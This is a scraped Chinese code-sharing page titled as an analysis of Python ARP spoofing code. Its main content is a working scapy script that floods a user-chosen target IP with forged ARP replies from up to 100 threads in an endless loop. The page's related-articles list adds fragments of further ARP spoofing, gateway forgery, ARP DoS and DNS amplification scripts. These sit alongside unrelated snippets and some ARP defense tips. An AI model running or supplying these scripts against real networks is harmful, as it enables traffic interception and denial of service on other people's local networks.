python发送arp欺骗攻击代码分析
# -*- coding: cp936 -*-
from scapy.all import *
from threading import Thread,Lock,activeCount
BROADCASTMAC = getmacbyip('192.168.0.120')
class Loop(Thread):
def __init__(self,ip):
Thread.__init__(self)
self.ip = ip
def run(self):
global BROADCASTMAC
arp = ARP()
arp.psrc = '192.168.0.251'
arp.hwsrc = BROADCASTMAC
arp.pdst = self.ip
arp.op = 2
sr1(arp,verbose = 0,retry = 0,timeout = 3)
class Main(Thread):
def __init__(self,ip):
Thread.__init__(self)
self.ip = ip
def run(self):
limit = 100
total = 0
while True:
if activeCount() < limit:
Loop(self.ip).start()
total = total + 1
print '目前已进行了ARP攻击的次数为:'+str(total)
if __name__ == '__main__':
ip = raw_input('请输入要进行ARP攻击的机器IP:')
Main(ip = ip).start()
相关推荐
-
Python中使用scapy模拟数据包实现arp攻击、dns放大攻击例子
scapy是python写的一个功能强大的交互式数据包处理程序,可用来发送.嗅探.解析和伪造网络数据包,常常被用到网络攻击和测试中. 这里就直接用python的scapy搞. 这里是arp的攻击方式,你可以做成arp攻击. 复制代码 代码如下: #!/usr/bin/python """ ARP attack """ import sys, os from scapy.all import * if os.geteuid() != 0:
-
python实现根据用户输入从电影网站获取影片信息的方法
本文实例讲述了python实现根据用户输入从电影网站获取影片信息的方法.分享给大家供大家参考.具体如下: 这段python代码主要演示了用户终端输入,正则表达式,网页抓取等 #!/usr/bin/env python27 #Importing the modules from BeautifulSoup import BeautifulSoup import sys import urllib2 import re import json #Ask for movie title title =
-
python写的ARP攻击代码实例
注:使用这个脚本需要安装scapy 包最好在linux平台下使用,因为scapy包在windows上安装老是会有各种问题 复制代码 代码如下: #coding:utf-8#example :sudo python arp_dos.py 192.168.1.103 from scapy.all import ARP,sendimport os,re,sys def get_gateway_ip(): t=os.popen('route -n') for i in t:
-
使用Python中的cookielib模拟登录网站
前面简单提到了 Python 模拟登录的程序,但是没写清楚,这里再补上一个带注释的 Python 模拟登录的示例程序.简单说一下流程:先用cookielib获取cookie,再用获取到的cookie,进入需要登录的网站. # -*- coding: utf-8 -*- # !/usr/bin/python import urllib2 import urllib import cookielib import re auth_url = 'http://www.nowamagic.net/' h
-
Python使用scrapy抓取网站sitemap信息的方法
本文实例讲述了Python使用scrapy抓取网站sitemap信息的方法.分享给大家供大家参考.具体如下: import re from scrapy.spider import BaseSpider from scrapy import log from scrapy.utils.response import body_or_str from scrapy.http import Request from scrapy.selector import HtmlXPathSelector c
-
python监控网站运行异常并发送邮件的方法
本文实例讲述了python监控网站运行异常并发送邮件的方法.分享给大家供大家参考.具体如下: 这是一个简单的python开发的监控程序,当指定网页状态不正常是通过smtp发送通知邮件 复制代码 代码如下: #!/usr/bin/env python # -*- coding: UTF-8 -*- #author libertyspy import socket import smtplib import urllib mail_options = { 'server':'smtp.qq
-
python发送伪造的arp请求
复制代码 代码如下: #!/usr/bin/env pythonimport socket s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)s.bind(("lo", 0)) src_addr = "\x50\x3d\xe5\x0e\x35\x3f"dst_addr = "\xff\xff\xff\xff\xff\xff"ethertype = "\x08\x06" s.
-
python使用arp欺骗伪造网关的方法
本文实例讲述了python使用arp欺骗伪造网关的方法.分享给大家供大家参考.具体实现方法如下: #coding:utf-8 ''' arp欺骗局域网pc,将伪造的网关mac以网关的arp应答发送给pc ''' from scapy.all import ARP,send,arping import sys,re stdout=sys.stdout IPADDR="192.168.1.*" gateway_ip='192.168.1.1' #伪造网关mac地址 gateway_hw='
-
python发送arp欺骗攻击代码分析
复制代码 代码如下: # -*- coding: cp936 -*-from scapy.all import *from threading import Thread,Lock,activeCount BROADCASTMAC = getmacbyip('192.168.0.120') class Loop(Thread): def __init__(self,ip): Thread.__init__(self) self.ip = ip def run(s
-
服务器的ARP欺骗攻击的防范的两种解决方法
服务器的ARP欺骗攻击的防范 这些天我的服务器几乎天天都被人ARP欺骗攻击,网页被挂木马,实在烦死了,深圳的龙岗电信机房实在是够恶心的,不得已,我只好寻找一些防范ARP攻击的方法,目前发现可以使用静态地址法和使用专用软件的方法来防范ARP欺骗攻击. 静态地址法指的是,在本地服务器上,将路由器的MAC地址设置为静态的方式来阻止别人对我的ARP攻击,如果你也越到了类似的ARP欺骗攻击,也可以参考这个方法进行设置. 首先,找到路由器真实的MAC地址,在没有被攻击的条件下,输入命令ar
-
局域网遭遇ARP欺骗攻击的解决方法
该病毒发作时症状表现为: 1)计算机网络连接正常,但无法上网或者时通时断,经常掉线: 2)用户私密信息(如QQ.网游等帐号)被窃取: 3)局域网内出现网络拥塞,甚至造成一些网络设备当机: 基本概念: 为了能够说明问题,有必要先来介绍一些基本概念,知者略过. 首先来说IP地址,大家应该都很熟悉了,我们知道,IP地址是一段32位(二进制)的无符号整数,例如:192.168.110.1,其最基本的作用就是在(IP)网络中唯一标识一台特定的主机.在Internet上,我们正是凭借IP地址来定位其他主机或
-
Python yield与实现方法代码分析
yield的功能类似于return,但是不同之处在于它返回的是生成器. 生成器 生成器是通过一个或多个yield表达式构成的函数,每一个生成器都是一个迭代器(但是迭代器不一定是生成器). 如果一个函数包含yield关键字,这个函数就会变为一个生成器. 生成器并不会一次返回所有结果,而是每次遇到yield关键字后返回相应结果,并保留函数当前的运行状态,等待下一次的调用. 由于生成器也是一个迭代器,那么它就应该支持next方法来获取下一个值. 基本操作 # 通过`yield`来创建生成器 def f
-
python 发送json数据操作实例分析
本文实例讲述了python 发送json数据操作.分享给大家供大家参考,具体如下: # !/usr/bin/env python # -*- coding: utf-8 -*- import urllib2 import urllib import cookielib import json import httplib import re import requests from lxml import etree import StringIO import time s = request
-
Python发送手机动态验证码代码实例
一.准备短信发送平台 首先进入http://user.ihuyi.com/nav/sms.html互亿天线,并且注册,进入首页 注册后会免费送50条消息 注册完后进入验证码通知短信,复制自己的api接口信息,apiid和apikey.并且保存 然后点击右上角的文档中心,进入后下载api文档 下载后为一个压缩包,解压.解压之后进入文件夹打开DEMO文件夹.里面为各种脚本语言实现发送短信的样本 找到python文本,直接打开可能会出现乱码,选择用记事本打开,然后全部copy到py文件中 二.修改p
-
服务器遭受arp欺骗的解决方法 原创
为了让大家跟我们一样以后免受arp攻击之苦,我们特给大家准备了下面的文章. 1.arp欺骗不论是局域网也好,还是我们的服务器内网也好,其实都是一样的,无外乎ip是内网还是外网的,都可以安装360的arp防火墙,不论是反追踪还是防御都是不错的,之前我们安装了antiarp的防火墙感觉终于被攻击到停止防御.这里并不是说antiarp防火墙不好只是在一些超大规模的攻击,antiarp容易挂掉.大家可以根据需要安装. 2.服务器最好arp绑定下. 复制代码 代码如下: if exist ipconfig
-
女友半夜加班发自拍 python男友用30行代码发现惊天秘密
事情是这样的 正准备下班的python开发小哥哥 接到女朋友今晚要加班的电话 并给他发来一张背景模糊的自拍照 如下 ↓ ↓ ↓ 敏感的小哥哥心生疑窦,难道会有原谅帽 然后python撸了一段代码 分析照片 分析下来 emmm 拍摄地址居然在 XXX酒店 小哥哥崩溃之余 大呼上当 python分析照片 小哥哥将发给自己的照片原图下载下来 并使用python写了一个脚本 读取到了照片拍摄的详细的地址 详细到了具体的街道和酒店名称 引入exifread模块 首先安装python的exifread模块,
-
网站源文件被注入了<iframe>代码—ARP欺骗的木马病毒攻击
最近我的网站突然出现访问的迟钝,并且打开之后杀毒软件立即提示含有木马病毒. 我就很纳闷,运行了4年的网站一直都好好的最近怎么出现病毒提示呢.职业习惯原因打开了网站的源代码查看,原来在网页源代码的头部被加入了<iframe>嵌套框架网页,该网页执行木马程序-- 按照常理我心中一寒:估计是服务器被人攻陷了,所有文件代码被加了此行代码,于是FTP上去,下载文件下来查看却没有该代码. 于是询问服务器管理员含笑,他一听就说:"是中ARP欺骗的病毒攻击了". 那么什么是"AR
随机推荐
- 正则表达式模式匹配的String方法
- cloudera manager 设置开机自启的方法
- java1.5中访问环境变量
- yii框架分类树扩展示例
- 判断日期是否能跨月查询的js代码
- asp.net SQL存储过程分页
- c#的treeview绑定和获取值的方法
- Python实现多线程抓取网页功能实例详解
- Linux用户在第一次登录时强制更改初始密码
- snprintf函数的用法解析
- Android实现阅读进度记忆功能
- js 日期加红代码 适用于各种cms 原创
- Android编程调节屏幕亮度(背景灯)及保持背景灯常亮的方法
- Nginx负载均衡(架构之路)详解
- PHP函数import_request_variables()用法分析
- js实现右下角提示框的方法
- Android键盘自动弹出解决方法分析
- 不能完成下载的原因及解决办法
- android生命周期深入分析(二)
- java代码效率优化方法(推荐)